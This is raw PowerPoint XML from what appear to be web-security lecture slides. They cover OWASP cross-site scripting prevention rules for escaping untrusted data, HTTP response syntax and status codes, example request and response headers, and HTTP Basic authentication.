              <a:t>RULE 3: JavaScript Escape Before Inserting Untrusted Data into HTML JavaScript Data Values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inside a quoted string: &lt;script&gt;alert('...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...')&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inside a quoted expression: &lt;script&gt;x='...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...'&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inside a quoted event handler: &lt;div </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>onmouseover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>='...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...'&lt;/div&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>RULE 4: CSS Escape Before Inserting Untrusted Data into HTML Style Property Values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;style&gt;selector { property : ...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...; } &lt;/style&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;span style=property : ...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...;&gt;text&lt;/style&gt;</a:t>
            </a:r>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290</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20187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Solutions to XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>RULE 5: URL Escape Before Inserting Untrusted Data into HTML URL Attributes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A normal link: &lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=http://...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...&gt;link&lt;/a &gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An image source: &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>='http://...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...' /&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A script source: &lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>="http://...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE..." /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check out: http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.owasp.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>index.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/XSS_(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Cross_Site_Scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Prevention_Cheat_Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458200" y="6400800"/>
            <a:ext cx="685800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BD5F6748-727B-F942-A49F-96C7BB40957B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>291</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15011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noProof="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 4" descr="first_web_page_93.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="-10390" t="12052" r="-7742" b="4257"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-420317" y="749300"/>
            <a:ext cx="9776799" cy="5376863"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2982978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Responses – Syntax</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Status line, followed by headers, followed by body</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Each line separated by CRLF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Headers separated by body via empty line (just CRLF)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Almost the same overall structure as request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36166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Responses – Status Codes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>1XX – Informational: request received, continuing to process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>2XX – Successful: request received, understood, and accepted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>3XX – Redirection: user agent needs to take further action to fulfill the request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>4XX – Client error: request cannot be fulfilled or error in request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>5XX – Server error: the server is aware that it has erred or is incapable of performing the request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31685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Responses – Status Codes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"200"   ; OK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"201"   ; Created</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"202"   ; Accepted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"204"   ; No Content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>“301"   ; Moved Permanently</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"307"   ; Temporary Redirect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" noProof="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23188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Responses – Status Codes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"400"   ; Bad Request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"401"   ; Unauthorized</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"403"   ; Forbidden</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"404"   ; Not Found</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"500"   ; Internal Server Error</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"501"   ; Not Implemented</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"502"   ; Bad Gateway</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"503"   ; Service Unavailable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" noProof="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="273020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Requests – Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>GET / HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>User-Agent: curl/7.37.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Host: www.google.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Accept: */*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" noProof="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" noProof="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12773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Responses – Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1228711"/>
            <a:ext cx="8229600" cy="4897453"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="55000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>HTTP/1.1 200 OK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Date: Tue, 13 Jan 2015 03:57:26 GMT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Expires: -1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Cache-Control: private, max-age=0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Content-Type: text/html; charset=ISO-8859-1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Set-Cookie: … </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Server: gws</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>X-XSS-Protection: 1; mode=block</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>X-Frame-Options: SAMEORIGIN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Alternate-Protocol: 80:quic,p=0.02</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Accept-Ranges: none</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Vary: Accept-Encoding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Transfer-Encoding: chunked</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" noProof="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>&lt;!doctype html&gt;&lt;html itemscope="" itemtype="http://schema.org/WebPage" lang="en"&gt;&lt;head&gt;&lt;meta content="Search the world's information, including webpages, images, videos and more. Go …</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="478020" y="1214831"/>
            <a:ext cx="1964775"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91620" y="1214831"/>
            <a:ext cx="1049007"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1540627" y="1214831"/>
            <a:ext cx="471903"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2012530" y="1214831"/>
            <a:ext cx="430265"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491620" y="1769724"/>
            <a:ext cx="1229440"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491620" y="2049697"/>
            <a:ext cx="3713874"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478020" y="2327010"/>
            <a:ext cx="4657402" cy="31066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78020" y="5075067"/>
            <a:ext cx="7813240" cy="760860"/>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29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a:t>HTTP Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Based on a simple </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" noProof="0" dirty="0"/>
              <a:t>challenge-response </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>scheme</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" noProof="0" dirty="0"/>
              <a:t>challenge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t> is returned by the server as part of a 401 (unauthorized) reply message and specifies the authentication schema to be used</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>An authentication request refers to a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" noProof="0" dirty="0"/>
              <a:t>realm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>, that is, a set of resources on the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>The client must include an Authorization header field with the required (valid) credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21338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HTTP Basic Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="431800" indent="-323850" defTabSz="449263">
              <a:spcBef>
                <a:spcPts val="43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a:t>The server replies to an unauthorized request with a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>401</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t> message containing the header field</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" noProof="0" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>WWW-Authenticate: Basic realm="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" noProof="0" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ReservedDocs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" noProof="0" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="-65" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2000" b="1" noProof="0" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="-65" charset="0"/>
            </a:endParaRP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a:t>The client retries the access including in the header a field containing a cookie composed of base64 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>encoded (RFC 2045) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>username and password</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" noProof="0" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>==</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRP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noProof="0" dirty="0">
